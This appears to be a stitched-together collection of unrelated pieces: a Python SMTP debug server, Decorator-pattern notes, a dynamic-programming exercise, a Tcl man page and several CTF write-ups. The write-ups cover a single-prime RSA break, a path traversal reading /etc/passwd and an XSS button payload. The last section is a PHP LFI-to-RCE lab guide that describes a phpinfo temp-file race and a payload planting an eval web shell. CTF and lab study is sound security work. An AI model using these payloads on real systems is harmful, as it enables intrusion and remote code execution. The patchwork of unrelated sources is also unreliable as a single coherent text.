# header of each incoming message (with a timestamp) to stdout.
import smtpd
import asyncore
import sys
import time


class CustomSMTPServer(smtpd.SMTPServer):
    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
        # data is the raw message; scan it line by line for the Subject header
        r = data.decode("utf-8").split("\n")
        for l in r:
            if l.startswith("Subject:"):
                sys.stdout.write("[{0}] {1}\n".format(time.time(), l))
                sys.stdout.flush()
                return


# server = smtpd.DebuggingServer(('0.0.0.0', 1025), None)  # alternative: dump whole messages
server = CustomSMTPServer(('0.0.0.0', 1025), None)

sys.stdout.write("[+] Start SMTPServer on 0.0.0.0:1025\n")
sys.stdout.flush()

asyncore.loop()
## Decorator

### Intent

Attach additional responsibilities to an object dynamically.

### Class Diagram

Both the decorator (Decorator) and the concrete component (ConcreteComponent) inherit from the component (Component). A concrete component's method implementations do not depend on other objects, whereas a decorator composes a component, so it can decorate other decorators or concrete components. Decorating means wrapping the decorator around the decoratee, thereby dynamically extending the decoratee's functionality. Part of a decorator's behavior is its own — its added functionality — and it then calls the decoratee's methods, thereby also preserving the decoratee's functionality. As can be seen, concrete components should sit at the lowest level of the decoration hierarchy, since only a concrete component's methods need no other object to be implemented.

<div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/6b833bc2-517a-4270-8a5e-0a5f6df8cd96.png"/> </div><br>

### Implementation

Design different kinds of beverages. A beverage can have condiments added, e.g. milk, with support for adding new condiments dynamically. Each added condiment increases the beverage's price; the task is to compute the price of a beverage.

The figure below shows adding the Mocha condiment onto a DarkRoast beverage, and then adding Whip on top. DarkRoast is wrapped by Mocha, which is in turn wrapped by Whip. They all inherit from the same parent class and all have a cost() method; the outer class's cost() calls the inner class's cost().

<div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/c9cfd600-bc91-4f3a-9f99-b42f88a5bb24.jpg" width="600"/> </div><br>

```java
public interface Beverage {
    double cost();
}
```

```java
public class DarkRoast implements Beverage {
    @Override
    public double cost() {
        return 1;
    }
}
```

```java
public class HouseBlend implements Beverage {
    @Override
    public double cost() {
        return 1;
    }
}
```

```java
public abstract class CondimentDecorator implements Beverage {
    protected Beverage beverage;
}
```

```java
public class Milk extends CondimentDecorator {

    public Milk(Beverage beverage) {
        this.beverage = beverage;
    }

    @Override
    public double cost() {
        return 1 + beverage.cost();
    }
}
```

```java
public class Mocha extends CondimentDecorator {

    public Mocha(Beverage beverage) {
        this.beverage = beverage;
    }

    @Override
    public double cost() {
        return 1 + beverage.cost();
    }
}
```

```java
public class Client {

    public static void main(String[] args) {
        Beverage beverage = new HouseBlend();
        beverage = new Mocha(beverage);
        beverage = new Milk(beverage);
        System.out.println(beverage.cost());
    }
}
```

```html
3.0
```

### Design principle

Classes should be open for extension but closed for modification — adding new functionality should not require modifying existing code. A beverage can have new condiments added dynamically without touching the beverage's code.

It is impossible to design every class to satisfy this principle; apply it to the places most likely to change.

### JDK

- java.io.BufferedInputStream(InputStream)
- java.io.DataInputStream(InputStream)
- java.io.BufferedOutputStream(OutputStream)
- java.util.zip.ZipOutputStream(OutputStream)
- java.util.Collections#checked[List|Map|Set|SortedSet|SortedMap]()
# Google CTF - Beginner's Quest (2021) Writeups for the 2021 Google CTF Beginner's Quest. ![](images/ctf.png)
# 47. Maximum Value of Gifts

[NowCoder](https://www.nowcoder.com/questionTerminal/72a99e28381a407991f2c96d8cb238ab)

## Problem

Every cell of an m\*n board holds a gift with some positive value. Starting from the top-left corner, you pick up gifts while moving one cell right or down at a time, until you reach the bottom-right corner. Given a board, find the maximum total value of the gifts collected. For example, for the board

```
1    10   3    8
12   2    9    6
5    7    4    11
3    7    16   5
```

the maximum gift value is 1+12+5+7+7+16+5=53.

## Solution

This should be solved with dynamic programming rather than depth-first search; DFS is far more expensive here and is not the optimal approach.

```java
public int getMost(int[][] values) {
    if (values == null || values.length == 0 || values[0].length == 0)
        return 0;
    int n = values[0].length;
    // dp[i]: best total value of a path ending at column i of the current row
    int[] dp = new int[n];
    for (int[] value : values) {
        dp[0] += value[0];
        for (int i = 1; i < n; i++)
            // come from above (old dp[i]) or from the left (dp[i - 1])
            dp[i] = Math.max(dp[i], dp[i - 1]) + value[i];
    }
    return dp[n - 1];
}
```
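A quick cross-check of the example board with the same recurrence, in Python:

```python
board = [
    [1, 10, 3, 8],
    [12, 2, 9, 6],
    [5, 7, 4, 11],
    [3, 7, 16, 5],
]
dp = [0] * len(board[0])
for row in board:
    dp[0] += row[0]
    for i in range(1, len(row)):
        dp[i] = max(dp[i], dp[i - 1]) + row[i]
print(dp[-1])  # 53
```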
# The worst RSA joke (Crypto)

In the task we get a [public key](public.pem) and [ciphertext](flag.enc). The task description states that someone decided to use a single prime as the modulus for RSA encryption.

The difficulty of breaking RSA rests on the fact that the count of integers coprime to the modulus (the so-called Euler's totient function) is secret. For a prime number this value is known and is simply `p-1`. For a product of two distinct primes it is `(p-1)*(q-1)`, and here lies the strength of RSA - in order to calculate this value we need to know the prime factors of the modulus, and finding those is hard.

In our case this whole problem doesn't exist, since we know `p` and therefore we know `p-1` as well. Therefore we can simply calculate the private exponent as `modinv(e, p-1)` and decrypt the ciphertext.

```python
import codecs

from Crypto.PublicKey import RSA

from crypto_commons.generic import bytes_to_long
from crypto_commons.rsa.rsa_commons import modinv, rsa_printable


def main():
    with codecs.open("public.pem", "r") as input_file:
        pub = input_file.read()
    pub = RSA.importKey(pub)
    print(pub.e, pub.n)
    with codecs.open("flag.enc", 'r') as input_flag:
        data = input_flag.read().decode("base64")
    d = modinv(pub.e, pub.n-1)
    print(rsa_printable(bytes_to_long(data), d, pub.n))


main()
```

And we get `Flag{S1nGL3_PR1m3_M0duLUs_ATT4cK_TaK3d_D0wn_RSA_T0_A_Sym3tr1c_ALg0r1thm}`
# ADMIN UI PWN-RE ## Description: > The command you just found removed the Foobanizer 9000 from the DMZ. While scanning the network, you find a weird device called Tempo-a-matic. According to a Google search it's a smart home temperature control experience. The management interface looks like a nest of bugs. You also stumble over some gossip on the dark net about bug hunters finding some vulnerabilities and because the vendor didn't have a bug bounty program, they were sold for US$3.49 a piece. Do some black box testing here, it'll go well with your hat. > > nc mngmnt-iface.ctfcompetition.com 1337 ## Solution: Connecting to the provided server provides us the following service: ``` root@kali:/media/sf_CTFs/google/adminui# nc mngmnt-iface.ctfcompetition.com 1337 === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit ``` Let's read the release notes: ``` root@kali:/media/sf_CTFs/google/adminui# nc mngmnt-iface.ctfcompetition.com 1337 === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? Version0.2 # Release 0.2 - Updated library X to version 0.Y - Fixed path traversal bug - Improved the UX === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? Version0.3 # Version 0.3 - Rollback of version 0.2 because of random reasons - Blah Blah - Fix random reboots at 2:32 every second Friday when it's new-moon. === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit ``` So version 0.2 fixed a path traversal vulnerability and version 0.3 reverted the fix. Let's start looking for a known file: ``` === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? ../etc/passwd Error: No such file or directory === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? ../../etc/passwd Error: No such file or directory === Management Interface === 1) Service access 2) Read EULA/patch notes 3) Quit 2 The following patchnotes were found: - Version0.2 - Version0.3 Which patchnotes should be shown? 
../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
user:x:1337:1337::/home/user:

=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
```

We found /etc/passwd at the following relative path: `../../../etc/passwd`. We can also guess that our user's home directory is `/home/user`, based on the last entry of the file. From there, we can find the flag with a bit of guessing:

```
root@kali:/media/sf_CTFs/google/adminui# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
../../../home/user/flag
CTF{I_luv_buggy_sOFtware}=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
```
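The interaction is simple enough to automate. A short sketch using pwntools (the prompts are the ones from the session above):

```python
from pwn import remote

r = remote("mngmnt-iface.ctfcompetition.com", 1337)
r.sendlineafter(b"3) Quit", b"2")                       # menu: read patch notes
r.sendlineafter(b"shown?", b"../../../home/user/flag")  # traversal payload
print(r.recvuntil(b"}").decode())                       # flag ends with '}'
```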
.TH MainFrame 3tk "tcllib - BWidget"
.SH NAME
.B MainFrame
- Manage a toplevel window with a menu, a toolbar and a status bar
.SH CREATION
.B MainFrame
pathName ?option value...?
.SH DESCRIPTION
A toplevel window managed by MainFrame has:
 * a simple menu built with automatic accelerator bindings and dynamic-help association,
 * one or more toolbars that the user can hide, and
 * a status bar showing user messages or menu descriptions, plus an optional progress bar.
.SH WIDGET-SPECIFIC OPTIONS
.TP
-height
Specifies the desired height of the user frame, in any form acceptable to Tk_GetPixels. If this option is less than or equal to zero (the default), no size is requested for the window at all.
.TP
-menu (read-only)
This option describes the menu. It is a list where every five elements describe one cascade menu. It has the following format:

{menu-name tag-list menu-id tearoff menu-entries...}

where menu-entries is a list whose elements each describe one menu entry; they may be:

a separator: {separator}
a command: {command menu-name ?tag-list? ?description? ?accelerator? ?option value? ...}
a checkbutton: {checkbutton menu-name ?tag-list? ?description? ?accelerator? ?option value? ...}
a radiobutton: {radiobutton menu-name ?tag-list? ?description? ?accelerator? ?option value? ...}
a cascade menu: {cascad menu-name ?tag-list? menu-id tearoff menu-entries}

where:
If menu-name contains a &, the following character is automatically converted into the corresponding option of the menu add command.
tag-list is the list of all tags of the entry, used to enable or disable menu entries with MainFrame::setmenustate.
menu-id is the id given to the menu; you can obtain the menu pathname from it with MainFrame::getmenu.
tearoff specifies whether the menu has a tearoff entry.
description specifies the string used for dynamic help.
accelerator specifies a keystroke sequence. It is a list of two elements, where the first is one of Ctrl, Alt or CtrlAlt, and the second is a letter or a digit. An accelerator string is built, and the corresponding binding is set on the toplevel window to invoke the menu entry.
option value specifies additional options for the entry (see the menu add command).

Every value surrounded by ? is optional and defaults to the empty string, but it must be provided if a following option is non-empty.
.TP
-separator (read-only)
Specifies whether a separator line is drawn at the top and/or bottom of the user window. Must be one of the values none, top, bottom or both. It depends on the relief of the user window's subwidgets.
.TP
-textvariable
Specifies the textvariable option for the status bar label. The dynamic-help descriptions of the menu entries are mapped to this variable when the MainFrame is created. If the variable is changed with MainFrame::configure, the menu descriptions will no longer be available. You can change the label text by modifying the value of this variable.
.TP
-width
Specifies the desired width of the user frame, in any form acceptable to Tk_GetPixels. If this option is less than or equal to zero (the default), no size is requested for the window at all.
.SH EXAMPLE
.nf
set descmenu {
    "&File" {} {} 0 {
        {command "&New" {} "Create a new document" {Ctrl n} -command Menu::new}
        {command "&Open..." {} "Open an existing file" {Ctrl o} -command Menu::open}
        {command "&Save" open "Save the document" {Ctrl s} -command Menu::save}
        {cascad "&Export" {} export 0 {
            {command "Format &1" open "Export the document as format 1" {} -command {Menu::export 1}}
            {command "Format &2" open "Export the document as format 2" {} -command {Menu::export 2}}
        }}
        {separator}
        {cascad "&Recent files" {} recent 0 {}}
        {separator}
        {command "E&xit" {} "Exit the application" {} -command Menu::exit}
    }
    "&Options" {} {} 0 {
        {checkbutton "Toolbar" {} "Show/hide the toolbar" {}
            -variable Menu::_drawtoolbar
            -command  {$Menu::_mainframe showtoolbar toolbar $Menu::_drawtoolbar} }
    }
}
.fi
.SH WIDGET COMMAND
.TP
pathName addindicator ?arg...?
Adds an indicator box at the right end of the status bar. Indicators are added left to right. An indicator is a Tk label widget configured with the option-value pairs given by ?arg...?. The -relief and -borderwidth options default to sunken and 1 respectively. Returns the pathname of the created label.
.TP
pathName addtoolbar
Adds a toolbar to the MainFrame. Returns the pathname of the new window in which the toolbar is placed.
.TP
pathName cget option
Returns the current value of the configuration option given by option. Option may be any value accepted by the creation command.
.TP
pathName configure ?option? ?value option value ...?
Queries or modifies the configuration options of the widget. If no option is specified, returns a list describing all available options for pathName. If option is specified without a value, the command returns a list describing the named option (this list is the corresponding subset of the value returned when no option is specified). If one or more option-value pairs are specified, the command modifies the given widget options to the given values; in this case the command returns an empty string. Option may be any value accepted by the creation command. Read-only options cannot be modified.
.TP
pathName getframe
Returns the pathname of the user window.
.TP
pathName getindicator index
Returns the indicator added at rank index.
.TP
pathName getmenu menuid
Returns the pathname of the menu whose id is menuid.
.TP
pathName gettoolbar index
Returns the pathname of the toolbar added at rank index.
.TP
pathName setmenustate tag state
Sets the -state option of all menu entries having the tag tag to state.
.TP
pathName showstatusbar name
name is one of none, status or progression. Use none to hide the status bar, status to show only the label, or progression to show the label and the progress bar.
.TP
pathName showtoolbar index bool
Hides the toolbar added at rank index if bool is 0, and shows it if bool is 1. To keep your toplevel window from resizing while hiding/showing a toolbar, do [wm geometry $top [wm geometry $top]] while managing it.
.SH "[Chinese version maintainer]"
.B 寒蝉退士
.SH "[Chinese version last updated]"
.B 2001/05/06
.SH "China Linux Forum man pages translation project:"
.BI http://cmpp.linuxforum.net
# Micro-CMS v1 - FLAG3

## 0x00 Index

![](../flag0/imgs/index.jpg)

## 0x01 Page 2

![](../flag0/imgs/2.jpg)

## 0x02 Edit Page 2

```html
<button onclick=alert(1)>Some button</button>
```

![](./imgs/edit.jpg)

Save the page - nothing visible happens.

## 0x03 FLAG

But the button may still trigger a JS event. Inspect the HTML of the saved page and grab the flag.

![](./imgs/flag.jpg)
## Eso Tape (RE, 80p)

Description: I once took a nap on my keyboard. I dreamed of a brand new language, but I could not decipher it nor get its meaning. Can you help me?

Hint: Replace the spaces with either '{' or '}' in the solution.

Hint: Interpreters don't help. Operations write to the current index.

This was a fun task. We were given source code in an unknown programming language and assumed it would print out the flag.

The first observation we made was that the number of `@*`, `@**` and `@***` instructions was about right for the flag, and their distribution across the code was roughly uniform - so we assumed those were print statements.

This is the start of the code:

```
##
%%
%++ %++ %++
%#
*&*
@**
%#
**&*
***-*
***-*
%++ %++
@***
```

This code should print out `IW`. After trying many things, we noticed that I is the 9th letter of the alphabet, which is `3*3` - and 3 is the number of `%++` instructions, so `*&*` was likely multiplication. We also guessed that `*`, `**` and `***` refer to distinct "registers" of the machine. Since the first print statement prints from the second register, something had to be put there first - after some trial and error, we concluded that `%#` is something like "move the current write pointer to the next register".

We wrote an interpreter covering these instructions, at which point we got stuck. After some time, an admin hinted on IRC that this is a real language. Looking it up on the esolang wiki, we found out it is `TapeBagel`. After finishing up the interpreter, we got the flag.
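To illustrate the semantics we inferred before learning the language's real name, here is a minimal interpreter for just this snippet. The meanings of `##` and `%%` are our assumptions (the real TapeBagel specification lives on the esolang wiki):

```python
code = "## %% %++ %++ %++ %# *&* @** %# **&* ***-* ***-* %++ %++ @***"
regs, cur = [0, 0, 0], 0                 # three registers: *, **, ***
for tok in code.split():
    if tok == "##":                      # program header, ignored (assumed)
        continue
    elif tok == "%%":                    # zero the current register (assumed)
        regs[cur] = 0
    elif tok == "%#":                    # advance the write pointer
        cur += 1
    elif tok == "%++":                   # increment the current register
        regs[cur] += 1
    elif tok.startswith("@"):            # print register as a letter (1 -> A)
        print(chr(ord("A") + regs[len(tok) - 2] - 1), end="")
    else:                                # X&Y multiply / X-Y subtract -> current register
        op = "&" if "&" in tok else "-"
        a, b = tok.split(op)
        x, y = regs[len(a) - 1], regs[len(b) - 1]
        regs[cur] = x * y if op == "&" else x - y
print()  # -> IW
```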
# PHP Local File Inclusion RCE with PHPINFO

[中文版本(Chinese version)](README.zh-cn.md)

In PHP file-inclusion vulnerabilities, when we cannot find a valid file to include to trigger RCE, we may still be able to include a temporary file - provided there is a PHPINFO page that leaks the randomly generated name and location of that temporary file.

Reference:

- https://dl.packetstormsecurity.net/papers/general/LFI_With_PHPInfo_Assitance.pdf

## Vulnerable Environment

To start the vulnerable environment:

```
docker compose up -d
```

The target environment runs the then-latest PHP 7.2, which shows the technique does not depend on an outdated PHP version. After the environment is started, `http://your-ip:8080/phpinfo.php` serves a PHPINFO page, and `http://your-ip:8080/lfi.php?file=/etc/passwd` shows there is an LFI vulnerability.

## Exploit Details

When PHP receives a POST request containing a FILE block, it saves the posted file into a temporary file (usually `/tmp/php` followed by 6 random characters); the filename can be found in the `$_FILES` variable. This temp file is deleted after the request finishes. Meanwhile, a PHPINFO page prints all the variables in the context, including `$_FILES`. So the temp file's name appears in the response if we send the POST request to the PHPINFO page. In this way, an LFI vulnerability can be promoted to RCE without a pre-existing usable local file.

The file-inclusion page and the PHPINFO page are usually different pages. In theory, we need to send the filename to the file-inclusion page after retrieving it from the response to the file-upload request sent to the PHPINFO page. However, once the first request finishes, the file is removed from disk, so we need to win the race.

Steps:

1. Send the file-upload request to the PHPINFO page, with the HEADER and GET fields padded with large chunks of junk data.
2. The response content will be huge, because PHPINFO prints out all of that data.
3. PHP's default output buffer size is 4096 bytes; roughly speaking, PHP returns 4096 bytes at a time over the socket connection.
4. So we use a raw socket: read 4096 bytes at a time, and send the filename to the LFI page as soon as we see it.
5. By the time we have the filename, the first socket connection has not yet ended, so the temp file still exists at that moment.
6. By taking advantage of this time gap, the temp file can be included and executed.

## Exploit

The Python script [exp.py](exp.py) implements the above process. After successfully including the temp file, `<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>` is executed to drop a permanent file `/tmp/g` for further use.

Use Python 2: `python exp.py your-ip 8080 100`:

![](1.png)

The script succeeds on the 189th attempt, after which arbitrary code can be executed:

![](2.png)
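The heart of that race - reading the phpinfo() response in output-buffer-sized chunks and grabbing the temp name as soon as it appears - looks roughly like this (a simplified sketch, not the full exp.py; the exact marker depends on how phpinfo() HTML-escapes the `=>` arrow):

```python
import re
import socket

def read_tmp_name(sock):
    """Read the phpinfo() response 4096 bytes at a time and return the temp
    filename as soon as it shows up, before the request has finished."""
    data = b""
    # phpinfo() typically HTML-encodes "=>" as "=&gt;" in its variable dump
    pattern = re.compile(rb"\[tmp_name\] =(?:&gt;|>) (/tmp/php[0-9A-Za-z]+)")
    while True:
        chunk = sock.recv(4096)   # matches PHP's default output_buffering size
        if not chunk:
            return None
        data += chunk
        m = pattern.search(data)
        if m:
            return m.group(1)     # race window is still open at this point
```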